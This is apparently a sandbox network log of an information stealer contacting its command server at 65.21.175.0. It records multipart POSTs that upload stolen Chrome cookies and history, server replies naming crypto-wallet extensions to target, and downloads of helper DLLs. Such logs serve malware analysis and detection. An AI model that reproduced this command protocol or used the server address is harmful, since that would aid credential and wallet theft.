Jun 27, 2024 05:59:18.663639069 CEST	480	IN	Data Raw: 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 Data Ascii: cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFB
Jun 27, 2024 05:59:18.665627003 CEST	465	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ Host: 65.21.175.0 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="message"plugins------CGHCFBAAAFHJDGCBFIIJ--
Jun 27, 2024 05:59:18.926790953 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Jun 27, 2024 05:59:18.926816940 CEST	1236	IN	Data Raw: 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 Data Ascii: bWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWx
Jun 27, 2024 05:59:18.926836014 CEST	1236	IN	Data Raw: 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 6c 68 59 6d 46 6a 61 32 52 71 59 32 6c 76 62 6d 74 76 59 6d 64 73 62 57 52 6b 5a 6d 4a 6a 61 6d Data Ascii: YmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGN
Jun 27, 2024 05:59:18.926846027 CEST	1236	IN	Data Raw: 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 70 71 62 47 46 6b 61 57 35 75 59 32 74 6b 5a 32 Data Ascii: Z2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmp
Jun 27, 2024 05:59:18.926865101 CEST	668	IN	Data Raw: 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 52 35 66 47 70 6f 5a 6d 70 6d 59 32 78 6c 63 47 46 6a 62 32 78 6b 62 57 70 74 61 32 31 6b 62 47 Data Ascii: cGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJ
Jun 27, 2024 05:59:18.958928108 CEST	466	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHC Host: 65.21.175.0 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="message"fplugins------IDHCGDAFBKFIDHJJJDHC--
Jun 27, 2024 05:59:19.219188929 CEST	303	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 108 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jun 27, 2024 05:59:19.312832117 CEST	199	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCFCFCGCGIEHIECAFCFI Host: 65.21.175.0 Content-Length: 6531 Connection: Keep-Alive Cache-Control: no-cache
Jun 27, 2024 05:59:19.312876940 CEST	6531	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 43 46 43 47 43 47 49 45 48 49 45 43 41 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 Data Ascii: ------GCFCFCGCGIEHIECAFCFIContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------GCFCFCGCGIEHIECAFCFIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jun 27, 2024 05:59:19.588406086 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:19.941040993 CEST	90	OUT	GET /b13597c85f807692/sqlite3.dll HTTP/1.1 Host: 65.21.175.0 Cache-Control: no-cache
Jun 27, 2024 05:59:20.198350906 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:20 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B
Jun 27, 2024 05:59:20.198374033 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 Data Ascii: @0B/70#N@B/81s:<R@B/92P @B
Jun 27, 2024 05:59:20.198390961 CEST	1236	IN	Data Raw: 0a 00 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 47 f7 0a 00 83 ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed Data Ascii: \|$D$4$Gtu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$r
Jun 27, 2024 05:59:20.198405981 CEST	1236	IN	Data Raw: 66 eb 61 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 74 66 eb 61 31 c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 Data Ascii: fa]UEt]%tfa1]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aS
Jun 27, 2024 05:59:20.198714018 CEST	1236	IN	Data Raw: 00 80 8b 45 dc 85 f6 89 08 89 58 04 b8 02 00 00 00 75 0c 83 7d e8 00 b8 03 00 00 00 0f 45 c2 83 c4 34 5b 5e 5f 5d c3 55 31 c9 89 e5 57 56 53 83 ec 0c 89 45 e8 89 55 ec 31 c0 31 d2 8b 5d e8 8a 1c 0b 0f b6 fb f6 87 e0 a1 ec 61 04 74 3a be 0a 00 00 Data Ascii: EXu}E4[^_]U1WVSEU11]at:krwvE1AutM[^_]UWVSxZlHxBLpu
Jun 27, 2024 05:59:23.780870914 CEST	741	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE Host: 65.21.175.0 Content-Length: 543 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="file"aXBsb2dnZXIuY28JRkFMU0UJLwlGQUxTRQkxNzUwOTk1NTkwCTU0NDkzNzk3MTM3MjYzOTA1CTIKaXBsb2dnZXIuY28JRkFMU0UJLwlGQUxTRQkxNzUwOTk1NTkwCWNsaGYwMzAyOGphCTguNDYuMTIzLjMzCg==------DBKKFHIEGDHJKECAAKKE--
Jun 27, 2024 05:59:24.045258045 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:24.063139915 CEST	617	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF Host: 65.21.175.0 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="file"aHR0cHM6Ly9pcGxvZ2dlci5jby8xbEx1Ygo=------EBGDAAKJJDAAKFHJKJKF--
Jun 27, 2024 05:59:24.335702896 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:24.353219032 CEST	557	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKE Host: 65.21.175.0 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 [TRUNCATED] Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file"------GCAFCAFHJJDBFIECFBKE--
Jun 27, 2024 05:59:24.614094019 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:25.869112015 CEST	557	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC Host: 65.21.175.0 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 [TRUNCATED] Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file"------KEGDAKEHJDHIDHJJDAEC--
Jun 27, 2024 05:59:26.177711010 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:26.728395939 CEST	90	OUT	GET /b13597c85f807692/freebl3.dll HTTP/1.1 Host: 65.21.175.0 Cache-Control: no-cache
